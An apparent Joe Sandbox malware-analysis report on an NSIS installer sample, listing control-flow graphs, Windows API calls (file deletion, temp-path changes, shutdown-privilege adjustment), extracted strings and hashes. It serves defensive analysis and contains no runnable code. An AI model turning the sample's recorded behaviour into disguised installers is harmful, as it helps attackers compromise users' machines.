46 40349b 41->46 58 403662-403672 call 403830 OleUninitialize 42->58 59 4035d4-4035da 42->59 43->42 61 40357e-4035ae GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 403317 43->61 45->40 45->46 46->40 54 4034e0 47->54 55 4034dc-4034de 47->55 48->37 57 403531-40353d call 4060f7 48->57 53->28 54->48 55->48 55->54 57->33 72 403796-40379c 58->72 73 403678-403688 call 405813 ExitProcess 58->73 62 403652-403659 call 40390a 59->62 63 4035dc-4035e7 call 405aba 59->63 61->42 61->58 70 40365e 62->70 74 4035e9-403612 63->74 75 40361d-403627 63->75 70->58 77 403818-403820 72->77 78 40379e-4037b7 GetCurrentProcess OpenProcessToken 72->78 79 403614-403616 74->79 82 403629-403636 call 405b7d 75->82 83 40368e-4036a2 call 40577e lstrcatA 75->83 80 403822 77->80 81 403826-40382a ExitProcess 77->81 85 4037e9-4037f7 call 406500 78->85 86 4037b9-4037e3 LookupPrivilegeValueA AdjustTokenPrivileges 78->86 79->75 87 403618-40361b 79->87 80->81 82->58 96 403638-40364e call 4060f7 * 2 82->96 97 4036a4-4036aa lstrcatA 83->97 98 4036af-4036c9 lstrcatA lstrcmpiA 83->98 94 403805-40380f ExitWindowsEx 85->94 95 4037f9-403803 85->95 86->85 87->75 87->79 94->77 99 403811-403813 call 40140b 94->99 95->94 95->99 96->62 97->98 98->58 101 4036cb-4036ce 98->101 99->77 102 4036d0-4036d5 call 4056e4 101->102 103 4036d7 call 405761 101->103 112 4036dc-4036e9 SetCurrentDirectoryA 102->112 103->112 113 4036f6-40371e call 4060f7 112->113 114 4036eb-4036f1 call 4060f7 112->114 118 403724-403740 call 40618a DeleteFileA 113->118 114->113 121 403781-403788 118->121 122 403742-403752 CopyFileA 118->122 121->118 123 40378a-403791 call 405ed6 121->123 122->121 124 403754-403774 call 405ed6 call 40618a call 405796 122->124 123->58 124->121 133 403776-40377d CloseHandle 124->133 133->121
                                                                APIs
                                                                • SetErrorMode.KERNELBASE ref: 0040336D
                                                                • GetVersion.KERNEL32 ref: 00403373
                                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033A6
                                                                • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 004033E2
                                                                • OleInitialize.OLE32(00000000), ref: 004033E9
                                                                • SHGetFileInfoA.SHELL32(00429850,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 00403405
                                                                • GetCommandLineA.KERNEL32(sprjtelakeringer Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 0040341A
                                                                • CharNextA.USER32(00000000,"C:\Users\user\Desktop\eAvqHiIsgR.exe",00000020,"C:\Users\user\Desktop\eAvqHiIsgR.exe",00000000,?,00000007,00000009,0000000B), ref: 00403456
                                                                • GetTempPathA.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 00403553
                                                                • GetWindowsDirectoryA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 00403564
                                                                • lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403570
                                                                • GetTempPathA.KERNEL32(000003FC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403584
                                                                • lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040358C
                                                                • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040359D
                                                                • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004035A5
                                                                • DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 004035B9
                                                                  • Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                                  • Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                                  • Part of subcall function 0040390A: lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\tranchet,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,771B3410), ref: 004039FA
                                                                  • Part of subcall function 0040390A: lstrcmpiA.KERNEL32(?,.exe), ref: 00403A0D
                                                                  • Part of subcall function 0040390A: GetFileAttributesA.KERNEL32(Call), ref: 00403A18
                                                                  • Part of subcall function 0040390A: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\tranchet), ref: 00403A61
                                                                  • Part of subcall function 0040390A: RegisterClassA.USER32(0042EBC0), ref: 00403A9E
                                                                  • Part of subcall function 00403830: CloseHandle.KERNEL32(000002F0,00403667,?,?,00000007,00000009,0000000B), ref: 0040383B
                                                                • OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 00403667
                                                                • ExitProcess.KERNEL32 ref: 00403688
                                                                • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004037A5
                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 004037AC
                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004037C4
                                                                • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004037E3
                                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 00403807
                                                                • ExitProcess.KERNEL32 ref: 0040382A
                                                                  • Part of subcall function 00405813: MessageBoxIndirectA.USER32(0040A218), ref: 0040586E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                                                                • String ID: "$"C:\Users\user\Desktop\eAvqHiIsgR.exe"$.tmp$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\eAvqHiIsgR.exe$C:\Users\user\tranchet$C:\Users\user\tranchet\Trykmaalere$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$sprjtelakeringer Setup$~nsu
                                                                • API String ID: 3776617018-3266798280
                                                                • Opcode ID: 9f7172ca61a1f038ac1aa6a8db1429cac06e36ed1de7e549aa4fc7ed9372f958
                                                                • Instruction ID: 2464a3ec660faf4d6335bd380e0cd13b62da1685a36c15adf6e00eeeb0483762
                                                                • Opcode Fuzzy Hash: 9f7172ca61a1f038ac1aa6a8db1429cac06e36ed1de7e549aa4fc7ed9372f958
                                                                • Instruction Fuzzy Hash: 49C107705047416AD7216F759D89B2F3EACAB4530AF45443FF181BA2E2CB7C8A058B2F

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 337 4058bf-4058e5 call 405b7d 340 4058e7-4058f9 DeleteFileA 337->340 341 4058fe-405905 337->341 342 405a88-405a8c 340->342 343 405907-405909 341->343 344 405918-405928 call 4060f7 341->344 345 405a36-405a3b 343->345 346 40590f-405912 343->346 352 405937-405938 call 405ad6 344->352 353 40592a-405935 lstrcatA 344->353 345->342 348 405a3d-405a40 345->348 346->344 346->345 350 405a42-405a48 348->350 351 405a4a-405a52 call 40646b 348->351 350->342 351->342 360 405a54-405a68 call 405a8f call 405877 351->360 355 40593d-405940 352->355 353->355 358 405942-405949 355->358 359 40594b-405951 lstrcatA 355->359 358->359 361 405956-405974 lstrlenA FindFirstFileA 358->361 359->361 376 405a80-405a83 call 40521e 360->376 377 405a6a-405a6d 360->377 363 40597a-405991 call 405aba 361->363 364 405a2c-405a30 361->364 370 405993-405997 363->370 371 40599c-40599f 363->371 364->345 367 405a32 364->367 367->345 370->371 373 405999 370->373 374 4059a1-4059a6 371->374 375 4059b2-4059c0 call 4060f7 371->375 373->371 379 4059a8-4059aa 374->379 380 405a0b-405a1d FindNextFileA 374->380 387 4059c2-4059ca 375->387 388 4059d7-4059e2 call 405877 375->388 376->342 377->350 382 405a6f-405a7e call 40521e call 405ed6 377->382 379->375 383 4059ac-4059b0 379->383 380->363 385 405a23-405a26 FindClose 380->385 382->342 383->375 383->380 385->364 387->380 391 4059cc-4059d5 call 4058bf 387->391 396 405a03-405a06 call 40521e 388->396 397 4059e4-4059e7 388->397 391->380 396->380 399 4059e9-4059f9 call 40521e call 405ed6 397->399 400 4059fb-405a01 397->400 399->380 400->380
                                                                APIs
                                                                • DeleteFileA.KERNELBASE(?,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 004058E8
                                                                • lstrcatA.KERNEL32(0042B898,\*.*,0042B898,?,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405930
                                                                • lstrcatA.KERNEL32(?,0040A014,?,0042B898,?,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405951
                                                                • lstrlenA.KERNEL32(?,?,0040A014,?,0042B898,?,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405957
                                                                • FindFirstFileA.KERNELBASE(0042B898,?,?,?,0040A014,?,0042B898,?,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405968
                                                                • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405A15
                                                                • FindClose.KERNEL32(00000000), ref: 00405A26
                                                                Strings
                                                                • "C:\Users\user\Desktop\eAvqHiIsgR.exe", xrefs: 004058BF
                                                                • C:\Users\user~1\AppData\Local\Temp\, xrefs: 004058CC
                                                                • \*.*, xrefs: 0040592A
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                • String ID: "C:\Users\user\Desktop\eAvqHiIsgR.exe"$C:\Users\user~1\AppData\Local\Temp\$\*.*
                                                                • API String ID: 2035342205-778396749
                                                                • Opcode ID: c5c9cbc54ac5a0b6362327b9ac4809c8afb714a0d61d87f2a5b8dc3e2328684f
                                                                • Instruction ID: 53fbf83e18d3e9f22f7fd61ce8145b7df245fbcc76992db59ab4b54644bc6f5f
                                                                • Opcode Fuzzy Hash: c5c9cbc54ac5a0b6362327b9ac4809c8afb714a0d61d87f2a5b8dc3e2328684f
                                                                • Instruction Fuzzy Hash: 4251C470A00A49AADB21AB618D85BBF7A78DF52314F14427FF841711D2C73C8942DF6A
                                                                APIs
                                                                • CoCreateInstance.OLE32(00408524,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F0
                                                                • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2
                                                                Strings
                                                                • C:\Users\user\tranchet\Trykmaalere, xrefs: 00402230
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: ByteCharCreateInstanceMultiWide
                                                                • String ID: C:\Users\user\tranchet\Trykmaalere
                                                                • API String ID: 123533781-2000945231
                                                                • Opcode ID: d5ac8e536bab36e1472226809c0cdf08a9d371e862c1e59943db98e9419baf02
                                                                • Instruction ID: cfd0f9f97044ed47efa98841b374527745dcc5d1cf4597a5ef188e8ddd78f045
                                                                • Opcode Fuzzy Hash: d5ac8e536bab36e1472226809c0cdf08a9d371e862c1e59943db98e9419baf02
                                                                • Instruction Fuzzy Hash: DF510671A00208AFCB50DFE4C989E9D7BB6FF48314F2041AAF515EB2D1DA799981CB54
                                                                APIs
                                                                • FindFirstFileA.KERNELBASE(771B3410,0042C0E0,0042BC98,00405BC0,0042BC98,0042BC98,00000000,0042BC98,0042BC98,771B3410,?,C:\Users\user~1\AppData\Local\Temp\,004058DF,?,771B3410,C:\Users\user~1\AppData\Local\Temp\), ref: 00406476
                                                                • FindClose.KERNELBASE(00000000), ref: 00406482
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: Find$CloseFileFirst
                                                                • String ID:
                                                                • API String ID: 2295610775-0
                                                                • Opcode ID: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
                                                                • Instruction ID: 43645372537bfa69987f3f85d1e9d0a1072f39b89fcefe97c81bac3be47e5bfd
                                                                • Opcode Fuzzy Hash: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
                                                                • Instruction Fuzzy Hash: 9AD01231514120DFC3502B786D4C84F7A589F05330321CB36F86AF22E0C7348C2296EC
                                                                APIs
                                                                • FindFirstFileA.KERNELBASE(00000000,?,00000002), ref: 004027B0
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: FileFindFirst
                                                                • String ID:
                                                                • API String ID: 1974802433-0
                                                                • Opcode ID: a5b213f8be24180874f9adf411d6afc31dfa0cb9f64df1b0b64d1ebf68b7fd5b
                                                                • Instruction ID: cbd12963852304709d998dbd60bf7e8f33587a64a337c4fd13578998f516bfb3
                                                                • Opcode Fuzzy Hash: a5b213f8be24180874f9adf411d6afc31dfa0cb9f64df1b0b64d1ebf68b7fd5b
                                                                • Instruction Fuzzy Hash: 3EF0A072604110DED711EBA49A49AFEB768AF61314F60457FF112B20C1D7B889469B3A

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 134 40390a-403922 call 406500 137 403924-403934 call 406055 134->137 138 403936-403967 call 405fde 134->138 145 40398a-4039b3 call 403bcf call 405b7d 137->145 143 403969-40397a call 405fde 138->143 144 40397f-403985 lstrcatA 138->144 143->144 144->145 152 4039b9-4039be 145->152 153 403a3a-403a42 call 405b7d 145->153 152->153 154 4039c0-4039e4 call 405fde 152->154 159 403a50-403a75 LoadImageA 153->159 160 403a44-403a4b call 40618a 153->160 154->153 161 4039e6-4039e8 154->161 163 403af6-403afe call 40140b 159->163 164 403a77-403aa7 RegisterClassA 159->164 160->159 166 4039f9-403a05 lstrlenA 161->166 167 4039ea-4039f7 call 405aba 161->167 176 403b00-403b03 163->176 177 403b08-403b13 call 403bcf 163->177 168 403bc5 164->168 169 403aad-403af1 SystemParametersInfoA CreateWindowExA 164->169 173 403a07-403a15 lstrcmpiA 166->173 174 403a2d-403a35 call 405a8f call 4060f7 166->174 167->166 172 403bc7-403bce 168->172 169->163 173->174 175 403a17-403a21 GetFileAttributesA 173->175 174->153 180 403a23-403a25 175->180 181 403a27-403a28 call 405ad6 175->181 176->172 187 403b19-403b33 ShowWindow call 406492 177->187 188 403b9c-403ba4 call 4052f0 177->188 180->174 180->181 181->174 195 403b35-403b3a call 406492 187->195 196 403b3f-403b51 GetClassInfoA 187->196 193 403ba6-403bac 188->193 194 403bbe-403bc0 call 40140b 188->194 193->176 197 403bb2-403bb9 call 40140b 193->197 194->168 195->196 200 403b53-403b63 GetClassInfoA RegisterClassA 196->200 201 403b69-403b9a DialogBoxParamA call 40140b call 40385a 196->201 197->176 200->201 201->172
                                                                APIs
                                                                  • Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                                  • Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                                • lstrcatA.KERNEL32(1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,771B3410,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\eAvqHiIsgR.exe",00000000), ref: 00403985
                                                                • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\tranchet,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,771B3410), ref: 004039FA
                                                                • lstrcmpiA.KERNEL32(?,.exe), ref: 00403A0D
                                                                • GetFileAttributesA.KERNEL32(Call), ref: 00403A18
                                                                • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\tranchet), ref: 00403A61
                                                                  • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                                                                • RegisterClassA.USER32(0042EBC0), ref: 00403A9E
                                                                • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403AB6
                                                                • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AEB
                                                                • ShowWindow.USER32(00000005,00000000), ref: 00403B21
                                                                • GetClassInfoA.USER32(00000000,RichEdit20A,0042EBC0), ref: 00403B4D
                                                                • GetClassInfoA.USER32(00000000,RichEdit,0042EBC0), ref: 00403B5A
                                                                • RegisterClassA.USER32(0042EBC0), ref: 00403B63
                                                                • DialogBoxParamA.USER32(?,00000000,00403CA7,00000000), ref: 00403B82
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                • String ID: "C:\Users\user\Desktop\eAvqHiIsgR.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\tranchet$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                • API String ID: 1975747703-191855299
                                                                • Opcode ID: eddc3fe444e159470dd51134533c2a37fedb4af5c6bfbfbca7f7312343edc14b
                                                                • Instruction ID: 74cd8b4f7d81cde8c77274d740e3983652abf123a0ec58253698c850822a2f16
                                                                • Opcode Fuzzy Hash: eddc3fe444e159470dd51134533c2a37fedb4af5c6bfbfbca7f7312343edc14b
                                                                • Instruction Fuzzy Hash: EC61A5702402016ED220FB669D46F373ABCEB4474DF50403FF995B62E3DA7DA9068A2D

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 208 402ea1-402eef GetTickCount GetModuleFileNameA call 405c90 211 402ef1-402ef6 208->211 212 402efb-402f29 call 4060f7 call 405ad6 call 4060f7 GetFileSize 208->212 213 4030d1-4030d5 211->213 220 403014-403022 call 402e3d 212->220 221 402f2f 212->221 227 403024-403027 220->227 228 403077-40307c 220->228 223 402f34-402f4b 221->223 225 402f4d 223->225 226 402f4f-402f58 call 4032ea 223->226 225->226 233 40307e-403086 call 402e3d 226->233 234 402f5e-402f65 226->234 230 403029-403041 call 403300 call 4032ea 227->230 231 40304b-403075 GlobalAlloc call 403300 call 4030d8 227->231 228->213 230->228 255 403043-403049 230->255 231->228 259 403088-403099 231->259 233->228 237 402fe1-402fe5 234->237 238 402f67-402f7b call 405c4b 234->238 245 402fe7-402fee call 402e3d 237->245 246 402fef-402ff5 237->246 238->246 257 402f7d-402f84 238->257 245->246 248 403004-40300c 246->248 249 402ff7-403001 call 4065b7 246->249 248->223 258 403012 248->258 249->248 255->228 255->231 257->246 261 402f86-402f8d 257->261 258->220 262 4030a1-4030a6 259->262 263 40309b 259->263 261->246 264 402f8f-402f96 261->264 265 4030a7-4030ad 262->265 263->262 264->246 266 402f98-402f9f 264->266 265->265 267 4030af-4030ca SetFilePointer call 405c4b 265->267 266->246 268 402fa1-402fc1 266->268 270 4030cf 267->270 268->228 271 402fc7-402fcb 268->271 270->213 272 402fd3-402fdb 271->272 273 402fcd-402fd1 271->273 272->246 274 402fdd-402fdf 272->274 273->258 273->272 274->246
                                                                APIs
                                                                • GetTickCount.KERNEL32 ref: 00402EB2
                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\eAvqHiIsgR.exe,00000400), ref: 00402ECE
                                                                  • Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\eAvqHiIsgR.exe,80000000,00000003), ref: 00405C94
                                                                  • Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                                • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\eAvqHiIsgR.exe,C:\Users\user\Desktop\eAvqHiIsgR.exe,80000000,00000003), ref: 00402F1A
                                                                • GlobalAlloc.KERNELBASE(00000040,00000020), ref: 00403050
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.2942592729.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000005.00000002.2942577449.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942607520.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.000000000044E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942621164.0000000000455000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                • Associated: 00000005.00000002.2942707095.0000000000458000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_400000_eAvqHiIsgR.jbxd
                                                                Similarity
                                                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                • String ID: "C:\Users\user\Desktop\eAvqHiIsgR.exe"$@TA$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\eAvqHiIsgR.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft$a
                                                                • API String ID: 2803837635-2626549225
                                                                • Opcode ID: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
                                                                • Instruction ID: b77d5a27d8a3a8735664692b17331c00252a13d20c8f5ee7c59d5cd6c332e3a5
                                                                • Opcode Fuzzy Hash: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
                                                                • Instruction Fuzzy Hash: B851E471A00204ABDF20AF64DD85FAF7AB8AB14359F60413BF500B22D1C7B89E858B5D

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
